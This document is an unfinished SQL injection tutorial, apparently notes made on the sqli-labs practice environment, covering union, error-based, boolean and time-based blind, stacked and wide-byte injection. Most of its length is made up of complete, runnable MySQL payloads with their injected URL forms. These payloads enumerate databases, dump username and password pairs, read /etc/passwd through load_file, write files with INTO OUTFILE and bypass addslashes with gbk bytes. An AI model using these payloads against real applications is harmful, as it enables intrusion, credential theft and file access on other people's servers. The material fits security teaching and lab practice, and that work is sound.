0. PHPStorm code debugging method
PHPStorm startup debugging method:
Append &XDEBUG_SESSION_START=PHPSTORM to the request URL to start a debugging session (PHPStorm must be listening for incoming Xdebug connections).
PHPStorm method of dynamically modifying variables during debugging:
While paused at a breakpoint, select the variable and press F2, or right-click it and choose the Set Value... option, to change its contents.
1. Union query injection
Prerequisite:
The page has display positions (columns of the query result that are echoed back to the user)
Advantages:
Convenient and fast, easy to use
Disadvantages:
Display positions are required
Subtypes:
* String injection
Try it:
Successful injection:
The following can be constructed to determine whether string injection exists:
* Integer injection
Try it:
Success
Union injection uses order by and group by to determine the number of columns in the query
order by can be followed by a column number; for example, sorting by the first column is order by 1, and so on
If the column number selected by order by exists, the page displays normally
If the selected column number is larger than the number of columns, the following error is reported
Narrowing the range by binary search in this way quickly determines the total number of columns, which the union select must match
If order by is not available, group by can be used in the same way to determine the number of columns
Integer injection can be confirmed as follows: append an arithmetic expression to the parameter; if 1+2 returns the same result as writing 3 directly, integer injection exists:
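A worked version of the steps above (injection type, column count, display positions), added here as an example; it is not code from the original page. It assumes a sqli-labs-style target whose PHP builds SELECT id, username, password FROM users WHERE id='$id' LIMIT 0,1 from the id parameter; the users table and its rows are constructed so the statements run in any MySQL client.

```sql
-- Constructed test data (assumption: a sqli-labs-style users table).
CREATE TABLE users (id INT, username VARCHAR(20), password VARCHAR(20));
INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you'), (3, 'Dummy', 'p@ssword');

-- Assumed application template:  SELECT id, username, password FROM users WHERE id='$id' LIMIT 0,1
-- Each comment gives the ?id= value and the statement the server receives; the runnable
-- statement below it is the effective query once the tail after "-- -" is commented out.

-- 1) String or integer injection?  A lone quote breaks the statement, quote + comment repairs it.
--    ?id=1'       server gets  ... WHERE id='1'' LIMIT 0,1        -> syntax error (unbalanced quote)
--    ?id=1'-- -   server gets  ... WHERE id='1'-- -' LIMIT 0,1    -> normal page: single-quote string injection
SELECT id, username, password FROM users WHERE id='1';
--    For an integer template (WHERE id=$id) arithmetic is evaluated: ?id=3-2 shows the row with id=1.
SELECT id, username, password FROM users WHERE id=3-2 LIMIT 0,1;

-- 2) Count the columns with ORDER BY, narrowing the number by binary search.
--    ?id=1' ORDER BY 3-- -   -> normal page, so at least 3 columns
SELECT id, username, password FROM users WHERE id='1' ORDER BY 3;
--    ?id=1' ORDER BY 4-- -   -> ERROR 1054: Unknown column '4' in 'order clause'  -> exactly 3 columns
SELECT id, username, password FROM users WHERE id='1' ORDER BY 4;
--    GROUP BY gives the same information when "order" is filtered:
--    ?id=1' GROUP BY 4-- -   -> ERROR 1054: Unknown column '4' in 'group statement'
SELECT id, username, password FROM users WHERE id='1' GROUP BY 4;

-- 3) Find the display positions: an id that matches no row makes the UNION row the only one shown.
--    ?id=-1' UNION SELECT 1,2,3-- -
SELECT id, username, password FROM users WHERE id='-1' UNION SELECT 1,2,3;
--    The page echoes "2" and "3" where username and password would go: those are the display positions.

-- 4) Replace a display position with the data you want.
--    ?id=-1' UNION SELECT 1,user(),version()-- -
SELECT id, username, password FROM users WHERE id='-1' UNION SELECT 1, user(), version();
```

MySQL only treats "--" as a comment when it is followed by whitespace, which is why the payloads end in "-- -" rather than a bare "--"; a "#" works the same way and is shorter.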
2. Method of listing all databases with injection
The most important database is information_schema, which contains three very important tables:
* schemata: the schema_name column holds the database names
* tables: table_schema holds the database name and table_name the names of the tables that exist in that database
* columns: column_name holds the column name, and table_schema and table_name the database and table it belongs to
Method to get all database names:
Results obtained:
Method to get the table names of a specific database:
Results obtained:
Method to get the column names of a specific table:
Results obtained:
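The three enumeration steps above carried through end to end, added here as an example rather than taken from the page. It assumes the sqli-labs layout (current database security with a users table holding username and password) and the same vulnerable statement SELECT id, username, password FROM users WHERE id='$id' LIMIT 0,1 with display positions in columns 2 and 3.

```sql
-- Step 1: all database names. group_concat() packs every row into one display position.
SELECT group_concat(schema_name) FROM information_schema.schemata;
-- injected: ?id=-1' UNION SELECT 1,(SELECT group_concat(schema_name) FROM information_schema.schemata),3-- -

-- Step 2: tables of a database. database() is the schema of the vulnerable query, so no name is needed;
-- for any other schema write the name as a hex literal so no quotes are required: 'security' = 0x7365637572697479
SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database();
SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=0x7365637572697479;

-- Step 3: columns of a table ('users' = 0x7573657273).
SELECT group_concat(column_name) FROM information_schema.columns
WHERE table_schema=0x7365637572697479 AND table_name=0x7573657273;

-- Step 4: dump the data; 0x3a is ':' and separates the two fields inside each row.
SELECT group_concat(username,0x3a,password) FROM security.users;
-- Full injected statement as the server receives it (everything after "-- -" is a comment):
-- SELECT id, username, password FROM users WHERE id='-1' UNION SELECT 1,(SELECT group_concat(username,0x3a,password) FROM security.users),3-- -' LIMIT 0,1

-- group_concat() silently truncates at group_concat_max_len (1024 bytes by default). When the output is
-- cut off, or group_concat is filtered, walk the rows one at a time with LIMIT instead:
SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1;
SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1;
```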
3. Use of load_file and into outfile
MySQL can read and write files through the load_file() function and select ... into outfile ....
1. load_file() reads file contents
On Windows the setting lives in the MySQL configuration file my.ini:
1. By default the secure_file_priv option is not set (i.e. secure_file_priv=NULL) and the query shows NULL. In this case MySQL is not allowed to read or write any file (newer releases, MySQL 5.7.6 and later, ship with this restrictive default).
2. Restrict mysqld's import and export to the /tmp directory: secure_file_priv=/tmp/
3. Do not restrict mysqld's import and export: secure_file_priv= (empty value)
On Linux the file is /etc/my.cnf.
Using MySQL to read a file remotely
Conditions for reading file contents with the load_file function:
* Absolute path
* The database user needs the FILE privilege (root has it), and the file must be readable by the OS account mysqld runs as
* secure_file_priv must not be NULL (and when it names a directory, the file must be inside it)
2. select into outfile writes contents
The file name cannot be written as a hexadecimal literal (unlike the argument of load_file(), it must be a quoted string)
Conditions for writing file contents with select ... into outfile ...:
* Absolute path
* The database user needs the FILE privilege (root has it), and the directory must be writable by the OS account mysqld runs as
* secure_file_priv must not be NULL
* Single or double quotes must be usable in the injection point (because the file name has to be a quoted string), and the file must not already exist
Try using load_file to read local contents:
Results obtained:
Nothing seems to be shown, but viewing the page source immediately reveals the file contents
Try writing a file with select ... into outfile ...
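The preconditions, the read and the write from this section in one runnable sequence, added here as an example and not taken from the page. Assumptions: a Linux host, an account that holds the FILE privilege, secure_file_priv set to /tmp/ (or empty), and the same vulnerable statement SELECT id, username, password FROM users WHERE id='$id' LIMIT 0,1.

```sql
-- 1) Check the preconditions first; both must pass before load_file() or INTO OUTFILE can do anything.
SELECT @@secure_file_priv;          -- NULL: file access disabled; '' : any path; '/tmp/': only under /tmp
SHOW GRANTS FOR CURRENT_USER();     -- look for FILE, or ALL PRIVILEGES ON *.*

-- Configuration producing each state ([mysqld] section of my.cnf / my.ini):
--   secure_file_priv=NULL      disable import and export entirely
--   secure_file_priv=/tmp/     restrict import and export to /tmp
--   secure_file_priv=          no restriction

-- 2) Read a file. load_file() returns NULL instead of an error when anything is wrong
--    (relative path, not readable by the mysqld user, outside secure_file_priv, larger than max_allowed_packet).
SELECT load_file('/etc/passwd');
SELECT load_file(0x2f6574632f706173737764);        -- same path as a hex literal: usable when quotes are escaped
-- injected: ?id=-1' UNION SELECT 1,load_file('/etc/passwd'),3-- -
-- injected: ?id=-1' UNION SELECT 1,load_file(0x2f6574632f706173737764),3-- -
-- When the file contains HTML the browser renders it instead of showing it; hex() keeps it visible on the page.
SELECT hex(load_file('/etc/passwd'));

-- 3) Write a file. The path must be a quoted string literal (no hex form here), the directory must be
--    writable by the mysqld user and inside secure_file_priv, and the file must not exist yet.
SELECT 'written by into outfile' INTO OUTFILE '/tmp/outfile_test.txt';
-- injected: INTO OUTFILE has to be the last clause, so the LIMIT tail of the original statement is commented out:
-- ?id=-1' UNION SELECT 1,'written by into outfile',3 INTO OUTFILE '/tmp/outfile_test.txt'-- -

-- 4) Verify the write by reading the file back.
SELECT load_file('/tmp/outfile_test.txt');
```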
4. Error-based SQL injection (error injection)
Prerequisite:
No display position is needed on the page, but the SQL execution error message must be output, for example through mysqli_error() or mysql_error()
Advantages:
No display positions are required
Disadvantages:
Requires the mysql_error() or mysqli_error() error message
The number of columns has to be taken into account when this is combined with union query injection
-- Note that this query has 2 columns (count(*) and x); the error is raised on the grouped column. If the original select has more columns, the union select in the injection must add columns to match, e.g. select 1, 2 union ...
select count(*), (concat(floor(rand(0)*2), (select user())))x from mysql.user
group by x;
The second method does not need to consider the number of columns; it only has to go after where:
select 1 from dual where 1=1 and (select 1 from (select
count(*),concat((select user()),floor(rand(0)*2))x from mysql.user group by x)a)
Let's take an example:
extractvalue error injection
Error injection through extractvalue() limits how much is displayed: only 32 characters of the error message are shown
To work around this, use the substr function to fetch the remaining content in pieces
extractvalue(xml string, string to extract): the second argument should normally be an XPath expression of the form '/../../...'. We instead put 0x7e, the ~ character, at the front, which is not valid XPath, so an XPATH syntax error is raised whose message echoes the contents of the string to be extracted, i.e. the information we need
updatexml error injection
It has the same incomplete-display problem; for the complete content, use substr to fetch it in segments
Trying extractvalue error injection and updatexml error injection in sqli-labs:
This is the result of extractvalue error injection:
This is the result of updatexml error injection:
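The three error-based techniques of this section, runnable in a MySQL client and shown with their injected forms; this is an added example, not code from the page. It assumes a page that echoes mysqli_error() and the same statement SELECT ... FROM users WHERE id='$id' LIMIT 0,1; the user name in the sample error text is whatever user() returns on your server.

```sql
-- 1) floor(rand(0)*2) with GROUP BY. rand(0) is a fixed sequence (0,1,1,0,1,1,...) and the group key is
--    evaluated a second time when a new group is inserted, which produces a duplicate key. The table in
--    FROM must have at least 3 rows; information_schema.tables always does, mysql.user may not.
SELECT count(*), concat(0x7e, (SELECT user()), 0x7e, floor(rand(0)*2)) x
FROM information_schema.tables GROUP BY x;
-- ERROR 1062: Duplicate entry '~root@localhost~1' for key 'group_key'   ('<group_key>' on MySQL 8)

-- 2) extractvalue(): the second argument must be XPath. '~...' is not, so the message echoes it.
--    Only 32 characters of the message are displayed (the ~ uses one), hence the substr() paging.
SELECT extractvalue(1, concat(0x7e, (SELECT user())));
-- ERROR 1105: XPATH syntax error: '~root@localhost'
SELECT extractvalue(1, concat(0x7e, substr((SELECT group_concat(table_name)
        FROM information_schema.tables WHERE table_schema=database()), 1, 31)));
SELECT extractvalue(1, concat(0x7e, substr((SELECT group_concat(table_name)
        FROM information_schema.tables WHERE table_schema=database()), 32, 31)));

-- 3) updatexml(): same trick, same 32-character limit, same paging with substr().
SELECT updatexml(1, concat(0x7e, (SELECT user())), 1);
-- ERROR 1105: XPATH syntax error: '~root@localhost'

-- 4) Injected forms. The expression sits in the WHERE clause, so the column count does not matter:
-- ?id=1' AND extractvalue(1, concat(0x7e, (SELECT user())))-- -
-- ?id=1' AND updatexml(1, concat(0x7e, (SELECT user())), 1)-- -
-- ?id=1' AND (SELECT 1 FROM (SELECT count(*), concat(0x7e, (SELECT user()), floor(rand(0)*2)) x
--                            FROM information_schema.tables GROUP BY x) a)-- -
```

The floor/rand variant is the one that depends on the row count of the table it groups over; the two XPath functions work from any row, which is why they are usually tried first.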
5. Boolean-based blind SQL injection (bool blind injection)
Prerequisite:
The page has no display positions and does not output SQL execution error messages
The only feedback is whether the page renders normally or not
Advantages:
No display positions are required, no error messages are required
Disadvantages:
Slow; it takes many requests and a lot of time
The sleep() function is used here: if the condition holds, sleep for 10 seconds
Note that 1=2 is always false. If id is wrapped in double quotes, the single quote we inject is just part of the string and MySQL converts "1' ..." to the number 1 (the leading digits are used and the rest is ignored), so the page renders normally. If it is wrapped in single quotes, the unbalanced quote is a syntax error and nothing is displayed.
This method finds the user name character by character through binary search over the letters
Why is there no echo position?
If there is no echo whether the SQL statement succeeds or fails, the only option is boolean or time-based blind injection combined with binary search: if the delay occurs, the ASCII value of the character is within the tested range
Try the experiment:
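The binary search described above carried through for one character, in both its boolean and its time-based form; this is an added example, not from the page. Assumptions: the target statement is SELECT ... FROM users WHERE id='$id' LIMIT 0,1 with no echo and no error output, and the current database is security (first character 's', ASCII 115), so run USE security first if you try it in a client. Each statement returns 1 or 0, which is exactly the bit the page leaks: a normal page for 1, a blank page for 0, or a delay for 1 in the time-based form.

```sql
-- 1) Length of the database name.   Injected: ?id=1' AND length(database())>5-- -
SELECT length(database())>5;                 -- 1
SELECT length(database())=8;                 -- 1

-- 2) Binary search over one character. Printable ASCII is 32..126, so at most 7 probes per character.
--    Injected form of each probe: ?id=1' AND ascii(substr(database(),1,1))>79-- -
SELECT ascii(substr(database(),1,1))>79;     -- 1  -> range 80..126
SELECT ascii(substr(database(),1,1))>103;    -- 1  -> range 104..126
SELECT ascii(substr(database(),1,1))>115;    -- 0  -> range 104..115
SELECT ascii(substr(database(),1,1))>109;    -- 1  -> range 110..115
SELECT ascii(substr(database(),1,1))>112;    -- 1  -> range 113..115
SELECT ascii(substr(database(),1,1))>114;    -- 1  -> 115, which is 's'
SELECT ascii(substr(database(),1,1))=115;    -- 1  confirm, then repeat with substr(database(),2,1)

-- 3) Time-based form, for pages that look identical whether the condition is true or false:
--    the response takes 5 seconds longer only when the condition holds.
--    Injected: ?id=1' AND if(ascii(substr(database(),1,1))>79, sleep(5), 0)-- -
SELECT if(ascii(substr(database(),1,1))>79, sleep(5), 0);
-- The same probe works for any value, e.g. the current account:
SELECT if(ascii(substr(user(),1,1))>79, sleep(5), 0);
```

Keep the delay short enough to stay under the web server's timeout but long enough to stand out from network jitter; measuring a baseline response time before probing avoids misreading a slow page as a true bit.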
6. Stacked SQL injection
This injection method is rarely usable, because PHP code normally runs queries with mysqli_query(), which rejects a string containing several statements; only mysqli_multi_query() sends multiple semicolon-separated statements to the server.
Even with mysqli_multi_query(), PHP reads only the first result set; the results of the following statements are fetched only when mysqli_next_result() is called.
The server still executes every statement in order; what the application sees is just the result of the first one. Look at an example:
The delay of the trailing select sleep(5) is therefore not visible in the response unless mysqli_next_result() is called, although a stacked insert or update still takes effect on the server.
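The stacked statement as the server receives it, with the check a practitioner would run to confirm it executed; this is an added example, not from the page. It assumes the same users table and that the application uses mysqli_multi_query() on SELECT id, username, password FROM users WHERE id='$id' LIMIT 0,1.

```sql
-- Injected: ?id=1'; INSERT INTO users VALUES (99,'stacked','stacked')-- -
-- The server receives and executes both statements in order:
SELECT id, username, password FROM users WHERE id='1'; INSERT INTO users VALUES (99,'stacked','stacked');

-- PHP renders only the first result set, so the page shows user 1 and says nothing about the INSERT.
-- A trailing SELECT sleep(5) would likewise not delay the page, because PHP never waits for its result.
-- Verify the side effect with an ordinary request instead of timing:
SELECT id, username FROM users WHERE id=99;      -- one row: 99, stacked

-- With mysqli_query() the whole string is rejected with a syntax error at the second statement,
-- so nothing is inserted and the only evidence is the error (if the page prints it).
```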
7. Wide-byte injection
The purpose of wide-byte injection is to get around escaping functions such as addslashes(). The precondition is that MySQL uses a multi-byte (wide) character set for the connection, for example set with:
set names gbk/gb2312/GB18030/BIG5...
Debugging with PHPStorm, take an example:
Union injection is used here. Internally the lab calls preg_replace() three times: it replaces \ with \\, and escapes single and double quotes with a backslash.
After the function returns, the single quote has been escaped
If the connection character set is gbk or gb2312, which use wide (two-byte) characters, MySQL treats a byte with a code greater than 128 (0x80) as the first byte of a Chinese character (a Chinese character is 2 bytes;
the byte that follows is taken as the second byte of the character)
Taking advantage of this, we construct an injection statement like this
The input part of the result looks like this
The whole statement becomes like this; the escaping has been swallowed, because %df%5c is parsed as one character and the quote after it is live again.
The content is displayed successfully
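The byte-level mechanism of this section checked directly against MySQL, with the fix beside it; this is an added example, not from the page. It assumes the same target statement SELECT id, username, password FROM users WHERE id='$id' LIMIT 0,1 with $id passed through addslashes() and a connection set up with set names gbk.

```sql
-- 1) Under gbk the two bytes DF 5C form ONE character: DF is a lead byte (0x81..0xFE) and
--    5C, the backslash, is a valid trail byte (0x40..0x7E or 0x80..0xFE).
SET NAMES gbk;
SHOW VARIABLES LIKE 'character_set_client';                          -- gbk: the parser decodes input as gbk
SELECT CHAR_LENGTH(CONVERT(0xDF5C USING gbk));                        -- 1
SELECT HEX(CONVERT(CONVERT(0xDF5C USING gbk) USING utf8mb4));         -- E9818B, the character 運
-- Under a single-byte character set the same bytes stay two characters, so the backslash keeps escaping:
SELECT CHAR_LENGTH(CONVERT(0xDF5C USING latin1));                     -- 2

-- 2) Byte view of the request  ?id=%df%27%20or%201=1%23
--    attacker sends   : DF 27 20 6F 72 20 31 3D 31 23        ( \xdf' or 1=1# )
--    after addslashes : DF 5C 27 20 6F 72 20 31 3D 31 23     ( \xdf\' or 1=1# )
--    parsed as gbk    : [DF 5C] 27 20 ...  =  運' or 1=1#    the quote is no longer escaped
-- Statement the parser sees (shown with the decoded character; on the wire it is the bytes DF 5C):
--   SELECT id, username, password FROM users WHERE id='運' or 1=1#' LIMIT 0,1
-- Everything after # is a comment, so every row of users is returned.

-- 3) Fix. Escaping has to know the connection charset: in PHP use mysqli_set_charset('gbk') instead of
--    a raw SET NAMES so mysqli_real_escape_string() treats DF 5C as one character, or move the connection
--    to utf8mb4, where DF cannot start a multi-byte sequence, and bind parameters with prepared statements.
SET NAMES utf8mb4;
SHOW VARIABLES LIKE 'character_set_client';                          -- utf8mb4
```

The latin1 line is the quick check for whether a given byte pair is at risk: if CHAR_LENGTH drops from 2 under a single-byte charset to 1 under the connection charset, the second byte (here the backslash) can be absorbed.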
How to quickly determine whether SQL injection exists?
* Arithmetic: see whether the corresponding value is returned, e.g. whether 2-1 and 1 give the same page; if they are equal, it is likely integer injection (or the parameter is not used at all)
* Check for errors: use the ' and " characters and see whether an error message appears
* and 1=1 / and 1=2: see whether the page changes; if there is no change, there is probably no injection
* Time-based: and sleep(10), see whether the page returns only after a delay
Injection modes:
* Union query injection
* Error-based injection
* Boolean-based injection
* Time-based injection
* Stacked injection
Injection types:
* String injection
* Integer injection
( Unfinished )